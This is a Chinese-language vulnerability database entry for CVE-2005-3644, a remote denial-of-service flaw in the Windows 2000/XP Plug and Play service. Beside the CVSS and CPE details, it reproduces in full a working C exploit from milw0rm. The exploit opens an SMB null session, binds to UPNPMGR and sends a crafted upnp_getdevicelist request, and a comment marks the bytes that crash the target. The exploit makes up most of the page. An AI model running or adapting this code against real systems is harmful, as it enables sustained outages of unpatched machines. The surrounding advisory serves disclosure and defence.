CVE-2005-3644
CVSS7.8
发布时间 :2005-11-17 06:02:00
修订时间 :2010-10-18 00:00:00
NMCOE    

[原文]PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120.


[CNNVD]Microsoft Windows即插即用拒绝服务漏洞(CNNVD-200511-222)

        Microsoft Windows即插即用(PnP)允许操作系统在安装新硬件时能够检测到这些硬件。
        Microsoft Windows即插即用服务中存在拒绝服务漏洞。如果攻击者能够向upnp_getdevicelist发送特制请求的话,就可能导致services.exe消耗过多的内存,直到耗尽目标机器的虚拟内存。请注意这个漏洞与MS05-047中所述漏洞无关。
        

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-399 [资源管理错误]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_xp::sp2:media_centerMicrosoft windows xp_sp2 media_center
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3644
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3644
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-222
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/15460
(UNKNOWN)  BID  15460
http://www.securiteam.com/exploits/6V00C15EKM.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/6V00C15EKM.html
http://www.milw0rm.com/exploits/1328
(UNKNOWN)  MILW0RM  1328
http://www.microsoft.com/technet/security/advisory/911052.mspx
(VENDOR_ADVISORY)  MSKB  911052
http://www.frsirt.com/exploits/20051117.Win_upnp_getdevicelist.c.php
(VENDOR_ADVISORY)  MISC  http://www.frsirt.com/exploits/20051117.Win_upnp_getdevicelist.c.php
http://www.eeye.com/Resources/Security-Center/Research/Zero-Day-Tracker/2005/20051116
(UNKNOWN)  MISC  http://www.eeye.com/Resources/Security-Center/Research/Zero-Day-Tracker/2005/20051116
http://securitytracker.com/id?1015233
(UNKNOWN)  SECTRACK  1015233
http://secunia.com/advisories/17595
(VENDOR_ADVISORY)  SECUNIA  17595
http://research.eeye.com/html/alerts/zeroday/20051116.html
(UNKNOWN)  MISC  http://research.eeye.com/html/alerts/zeroday/20051116.html

- 漏洞信息

Microsoft Windows即插即用拒绝服务漏洞
高危 其他
2005-11-17 00:00:00 2006-12-08 00:00:00
远程  
        Microsoft Windows即插即用(PnP)允许操作系统在安装新硬件时能够检测到这些硬件。
        Microsoft Windows即插即用服务中存在拒绝服务漏洞。如果攻击者能够向upnp_getdevicelist发送特制请求的话,就可能导致services.exe消耗过多的内存,直到耗尽目标机器的虚拟内存。请注意这个漏洞与MS05-047中所述漏洞无关。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.microsoft.com/technet/security/

- 漏洞信息 (1328)

MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit (EDBID:1328)
windows dos
2005-11-16 Verified
0 Winny Thomas
N/A [点击下载]
/* 
 * Author: Winny Thomas
 * 	     Nevis Labs, Pune, INDIA 	
 *
 * Details: 
 * While working on the exploit for MS05-047 i came across a condition where
 * a specially crafted request to upnp_getdevicelist would cause 
 * services.exe to consume memory to a point where the target machines virtual
 * memory gets exhausted. This exploit is NOT similar to the MS05-047 exploit i 
 * published earlier. The earlier one trashed the EIP of the target causing a 
 * crash in services.exe and eventually brought down the system to shut down. 
 * However in this exploit (again a DOS) the virtual memory is consumed to a 
 * point where desktop requests (like clicking "My Computer"), HTTP requests,
 * SMB requests etc does not get serviced for sometime. After sometime the 
 * memory usage comes down and the target system would work as normal. However
 * this code when continuosly executed against a target leads to a sustained 
 * DOS attack.
 * Start the task manager on the target system and run this code against the 
 * target and watch the virtual memory usage shoot up.
 *
 * I used windbg to break on calls to upnp_getdevicelist when running this code.
 * However even before the break point is hit the system becomes unresponsive. 
 * Strangely though changing the operation number in the DCERPC request to 
 * something else other than 0xa (upnp_getdevicelist) will make the DOS attempt
 * fail. Perhaps changing the payload a little bit, so that the underlying 
 * demarshalling routines dont return an error, might reproduce this effect
 * for other UPNP operations as well.
 *
 * TESTED ON: Windows 2000 server SP0, SP2 and SP3. I have not tested this on
 * any of the above machines with the recent hot fixes for UPNP.
 * 
 * Note: This code is for educational/testing purposes by authorized persons on networks systems setup for such purposes 
 * The author shall bear no responsibility for any damage caused by using this code. 
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

unsigned short ProcessID = 0;
unsigned short TID = 0;
unsigned short UserID = 0;
unsigned short FID = 0;

char peer0_0[] = 
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00" ;

char peer0_1[] = 
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";

char peer0_1_2[] = 
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";

char peer0_2[] = 
"\x00\x00\x00\x58\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2D\x00\x00";

char peer0_3[] = 
"\x00\x00\x00\x66\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe"
"\x00\x08\x40\x00\x18\xff\x00\xde\xde\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5c\x00\x62\x00\x72\x00\x6f\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";

char peer0_4[] = 
"\x00\x00\x00\x9A\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x08\x01\xC0"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x01\x00\x10\x00\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x48\x00\x52\x00\x02"
"\x00\x26\x00\x00\x40\x57\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00"
"\x00\x00\x00\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11\x8F\x69"
"\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C"
"\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";

char peer0_5[] =
//NETBIOS Fields
//==============
"\x00"		//Message type
"\x00\x00\x80"  //Payload length 			C
//SMB Fields
//==========
//SMB Header
"\xFF\x53\x4D\x42\x2F\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x40\x6D\x4E\xF4\x8C\x6E\x13\x7B\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x00\x01"
//Write ANDX Request fields
"\x0E" //Word count
"\xFF\x00\xDE\xDE\x00\x40\x00\x00\x00\x00\xFF"
"\xFF\xFF\xFF\x08\x00"
"\x40\x00" //Remaining					C
"\x00\x00" //Data Length High
"\x40\x00" //Data Length Low				C
"\x40\x00" //Data Offset				C	
"\x00\x00\x00\x00" //High Offset
"\x41\x00" //Byte count					C
"\xEE"//Padding
//DCE RPC Request field
//=====================
"\x05\x00\x00\x03\x10\x00\x00\x00"
"\x40\x00" //Frag Length
"\x00\x00" //Auth Length
"\x8D\x00\x00\x00" //Call Id
"\x28\x00\x00\x00" //Alloc HINT				C
"\x00\x00"  //Context Id
"\x0A\x00"  //OpNum; 10 in our case for PNP_GetDeviceList
//DATA for GetDeviceList 
"\x00\x00\x00\x00"
"\x10\x10\x10\x10" //This is what kills the target. \x00\x00\x00\x00 is safe
"\x48\x54\x52\x45\x45\x5C\x52\x4F\x4F\x54\x5C"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";

void send_packet(int sock, char *payload, int size,
char *type)
{
	int ntrans, ret;
	
	memcpy(&payload[30], &ProcessID, 2);
	
	if (UserID) 
		memcpy(&payload[32], &UserID, 2);
	if (TID)
		memcpy(&payload[28], &TID, 2);

	if (strcmp(type, "Sending DCE RPC Bind UPNPMGR request") == 0) {
		memcpy(&payload[67], &FID, 2);
	}
	if (strcmp(type, "UPNPMGR upnp_getdevicelist request") == 0) {
		memcpy(&payload[41], &FID, 2);
	}

	printf("[*] %s: ", type);
	fflush(stdout);
	ntrans = send(sock, payload, size, 0);
	if (ntrans < 0) {
		printf("\033[0;31mFailed\033[0;39m\n\n");
		exit(-1);
	}
}

void get_response(int sock, char *type)
{
	int ret;
	char response[1496];

	ret = recv(sock, response, 1496, 0);
	if (strcmp(type, "Null Session request 1") != 0) {
		if ((ret < 0 || response[9] != 0)) {
			printf("\033[0;31mError in %s response\033[0;39m\n\n", type);
			exit(-1);
		}
	}
	
	if (strcmp(type, "Null Session request 1") == 0) {
		UserID = *(unsigned short *)&response[32];
	}
	if (strcmp(type, "Tree Connect") == 0) {
		TID = *(unsigned short *)&response[28];
	}
	if (strcmp(type, "NT Creat AndX") == 0) {
		FID = *(unsigned short *)&response[42];
	}
	
	if (strcmp(type, "UPNPMGR upnp_getdevicelist") == 0)
{
		if((unsigned long)response[88] != 0) {
			printf("\033[0;31mnca_s_fault_ndr\033[0;39m\n\n");
			exit(-1);
		}
	}
	printf("\033[0;32mOK\033[0;39m\n");
}

void banner()
{

printf("\n\n\033[0;31m\t!------------------------------------------!\n\033[0;39m");
	printf("\033[0;31m\t Memory leak when sending upnp_getdevicelist request\n\033[0;39m");
	printf("\033[0;31m\t Coded by: \033[0;34m Winny Thomas :-)\n\033[0;39m");
	printf("\033[0;34m\t\t    NevisLabs\n\033[0;39m");
	printf("\033[0;34m\t\t    Nevis Networks, Pune, INDIA\n\033[0;39m");

printf("\033[0;31m\t!------------------------------------------!\n\n\033[0;39m");
}

char *setup_tCon(char *UNC, char *ptr)
{
	int pindex = 0, uindex = 0, len;	
	
	len = strlen(UNC);
	while (uindex < len) {
		if ((pindex % 2) != 0) {
			ptr[pindex] = '\x00';
			pindex++;
			continue;
		}

		ptr[pindex] = UNC[uindex];
		uindex++;
		pindex++;
	}

	ptr[pindex] = '\x00';
	pindex++;
	ptr[pindex] = '\x00';
	pindex++;
	ptr[pindex] = '\x00';
	pindex++;

	ptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++; ptr[pindex] ='C'; pindex++;

	ptr[pindex] = '\x00';
	pindex++;
	ptr[pindex] = '\x00';
	pindex++;
}

int main(int argc, char *argv[])
{
	struct sockaddr_in target;
	struct hostent *host;
	char UNC[50], tConXpacket[150], *temp, targetIP[20];
	int sockfd;
	int ret, templen;
	
	system("clear");
	banner();

	if (argc < 2) {
		printf("Usage: %s <host name|ip address>\n\n", argv[0]);
		exit(-1);
	}
	
	srand(time(NULL));
	ProcessID = rand();

	printf("[*] Resolving %s: ", argv[1]);
	host = gethostbyname(argv[1]);
	if (!host) {
		printf("\033[0;31mFailed\033[0;39m\n");
		exit(-1);
	}
	printf("\033[0;32mOK\033[0;39m\n");
	
	target.sin_family = AF_INET;
	target.sin_addr = *(struct in_addr *)host->h_addr;
	target.sin_port = htons(445);
	sprintf(targetIP, "%s", inet_ntoa(target.sin_addr));
	
	sockfd = socket(AF_INET, SOCK_STREAM, 0);
	ret = connect(sockfd, (struct sockaddr *)&target, sizeof(target));
	if (ret < 0) {
		perror("Connect");
		exit(-1);
	}

	send_packet(sockfd, peer0_0, sizeof(peer0_0) -1, "Sending SMB Negotiate request");
	get_response(sockfd, "SMB Negotiate");	

	send_packet(sockfd, peer0_1, sizeof(peer0_1) -1, "Sending Null Session request");
	get_response(sockfd, "Null Session request 1");

	send_packet(sockfd, peer0_1_2, sizeof(peer0_1_2) -1, "Sending Null Session request");
	get_response(sockfd, "Null Session request 2");

	bzero(tConXpacket, 150);
	temp = tConXpacket;
	memcpy(tConXpacket, peer0_2, sizeof(peer0_2));
	temp += sizeof(peer0_2) -1;
	sprintf(UNC, "\\\\%s\\IPC$", targetIP);
	setup_tCon(UNC, temp);
	templen = (strlen(UNC)*2) +9;
	tConXpacket[3] = 43 + templen;
	templen -= 2;
	memcpy((unsigned long *)&tConXpacket[45], &templen, 1);

	send_packet(sockfd, tConXpacket, sizeof(peer0_2) +templen, "Sending Tree Connect request");
	get_response(sockfd, "Tree Connect");

	send_packet(sockfd, peer0_3, sizeof(peer0_3) -1, "Sending NT Creat AndX request");
	get_response(sockfd, "NT Creat AndX");

	send_packet(sockfd, peer0_4, sizeof(peer0_4) -1, "Sending DCE RPC Bind UPNPMGR request");
	get_response(sockfd, "DCE RPC Bind UPNPMGR");

	send_packet(sockfd, peer0_5, sizeof(peer0_5) -1, "UPNPMGR upnp_getdevicelist request");
	get_response(sockfd, "UPNPMGR upnp_getdevicelist");

	close(sockfd);
}

// milw0rm.com [2005-11-16]
		

- 漏洞信息

20916
Microsoft Windows UPnP GetDeviceList Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-11-13 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站